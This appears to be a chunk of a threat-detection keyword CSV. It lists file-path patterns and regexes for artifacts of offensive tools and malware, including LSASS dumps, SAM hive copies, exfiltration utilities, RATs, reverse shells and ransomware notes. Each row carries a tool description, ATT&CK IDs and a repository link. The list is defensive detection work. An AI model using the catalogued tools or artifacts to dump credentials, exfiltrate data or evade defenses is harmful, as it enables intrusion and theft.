"*\UnmanagedPowerShell.sln*",".{0,1000}\\UnmanagedPowerShell\.sln.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19520"
"*\UnmanagedPowerShell.vcxproj*",".{0,1000}\\UnmanagedPowerShell\.vcxproj.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19521"
"*\unpackerLoadEXE.exe*",".{0,1000}\\unpackerLoadEXE\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","19522"
"*\UnquotedServicePath.cs*",".{0,1000}\\UnquotedServicePath\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","19523"
"*\unquotedsvcpath.o*",".{0,1000}\\unquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","19524"
"*\unrootkit.dll*",".{0,1000}\\unrootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","19525"
"*\UnstoppableService.csproj*",".{0,1000}\\UnstoppableService\.csproj.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","19526"
"*\UnstoppableService.sln*",".{0,1000}\\UnstoppableService\.sln.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","19527"
"*\UnstoppableService-master*",".{0,1000}\\UnstoppableService\-master.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","19528"
"*\Upload-OneDrive.csproj*",".{0,1000}\\Upload\-OneDrive\.csproj.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","19533"
"*\Upload-OneDrive.exe*",".{0,1000}\\Upload\-OneDrive\.exe.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","19534"
"*\Upload-OneDrive.sln*",".{0,1000}\\Upload\-OneDrive\.sln.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","19535"
"*\URL_obfuscated.log*",".{0,1000}\\URL_obfuscated\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19536"
"*\usbmon.txt*",".{0,1000}\\usbmon\.txt.{0,1000}","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","#linux #windows","N/A","N/A","N/A","N/A","N/A","N/A","N/A","19537"
"*\user_persistence_run.c*",".{0,1000}\\user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","19538"
"*\UserRightsUtil.exe*",".{0,1000}\\UserRightsUtil\.exe.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19539"
"*\Users\*\c2.db*",".{0,1000}\\Users\\.{0,1000}\\c2\.db.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","19542"
"*\Users\How To Restore Your Files.txt*",".{0,1000}\\Users\\How\sTo\sRestore\sYour\sFiles\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","ransomware note from knight ransomware","T1486","TA0040","N/A","N/A","Ransomware","https://tria.ge/230901-c2fbqacb36","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19543"
"*\Users\Public\*.blf*",".{0,1000}\\Users\\Public\\.{0,1000}\.blf.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19544"
"*\Users\Public\.2796*",".{0,1000}\\Users\\Public\\\.2796.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19548"
"*\Users\Public\.p*",".{0,1000}\\Users\\Public\\\.p.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19549"
"*\Users\Public\.p_0_*",".{0,1000}\\Users\\Public\\\.p_0_.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19550"
"*\Users\Public\.p_1_*",".{0,1000}\\Users\\Public\\\.p_1_.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19551"
"*\Users\Public\.p_128*",".{0,1000}\\Users\\Public\\\.p_128.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19552"
"*\Users\Public\.p_2_*",".{0,1000}\\Users\\Public\\\.p_2_.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19553"
"*\Users\Public\.p_720*",".{0,1000}\\Users\\Public\\\.p_720.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19554"
"*\Users\Public\128.blf*",".{0,1000}\\Users\\Public\\128\.blf.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19555"
"*\Users\Public\720.blf*",".{0,1000}\\Users\\Public\\720\.blf.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19556"
"*\users\public\desktop\Fix-Your-Files.txt*",".{0,1000}\\users\\public\\desktop\\Fix\-Your\-Files\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","19557"
"*\Users\Public\Documents\$($env:USERNAME)log.txt*",".{0,1000}\\Users\\Public\\Documents\\\$\(\$env\:USERNAME\)log\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19559"
"*\Users\Public\Documents\comm.txt*",".{0,1000}\\Users\\Public\\Documents\\comm\.txt.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","19560"
"*\Users\Public\DtcInstall.txt*",".{0,1000}\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","19561"
"*\Users\Public\lsass.dmp*",".{0,1000}\\Users\\Public\\lsass\.dmp.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","19562"
"*\Users\Public\nc.exe*",".{0,1000}\\Users\\Public\\nc\.exe.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","19563"
"*\Users\Public\ngrok.exe*",".{0,1000}\\Users\\Public\\ngrok\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19564"
"*\Users\Public\quran.txt*",".{0,1000}\\Users\\Public\\quran\.txt.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","19565"
"*\Users\Public\revshell.exe*",".{0,1000}\\Users\\Public\\revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","19566"
"*\users\public\sam.save*",".{0,1000}\\users\\public\\sam\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","19567"
"*\Users\Public\server.exe*",".{0,1000}\\Users\\Public\\server\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19568"
"*\users\public\system.save*",".{0,1000}\\users\\public\\system\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","19569"
"*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19570"
"*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19571"
"*\Users\Public\termsrv.patch.dll*",".{0,1000}\\Users\\Public\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19572"
"*\Users\Public\Windows\Ui*",".{0,1000}\\Users\\Public\\Windows\\Ui.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19573"
"*\Users\Public\Windows\Ui\*",".{0,1000}\\Users\\Public\\Windows\\Ui\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19574"
"*\Users_Nochangedpassword.txt*",".{0,1000}\\Users_Nochangedpassword\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19575"
"*\Use-Waitfor.exe*",".{0,1000}\\Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19576"
"*\UUID_bypass.py*",".{0,1000}\\UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","19579"
"*\valid-creds.txt*",".{0,1000}\\valid\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","19587"
"*\vanity.exe*",".{0,1000}\\vanity\.exe.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","19588"
"*\Vanity_Dump.cpp*",".{0,1000}\\Vanity_Dump\.cpp.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","19589"
"*\Vanity_Dump.exe*",".{0,1000}\\Vanity_Dump\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","19590"
"*\Vanity_Dump.sln*",".{0,1000}\\Vanity_Dump\.sln.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","19591"
"*\VanToM RAT *.exe*",".{0,1000}\\VanToM\sRAT\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19592"
"*\vba_gen.py*",".{0,1000}\\vba_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","19593"
"*\VBad.py*",".{0,1000}\\VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","19594"
"*\vbarandomizer.py*",".{0,1000}\\vbarandomizer\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19595"
"*\vcenter_creds.txt*",".{0,1000}\\vcenter_creds\.txt.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","19598"
"*\VDR-main.zip",".{0,1000}\\VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","19599"
"*\veeam_dump.py*",".{0,1000}\\veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19600"
"*\veeam-creds\*",".{0,1000}\\veeam\-creds\\.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","19601"
"*\VeeamHax.exe",".{0,1000}\\VeeamHax\.exe","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","19602"
"*\VeeamHax.pdb*",".{0,1000}\\VeeamHax\.pdb.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","19603"
"*\VeeamHax.sln*",".{0,1000}\\VeeamHax\.sln.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","19604"
"*\Venom.v1.0.1.7z*",".{0,1000}\\Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19605"
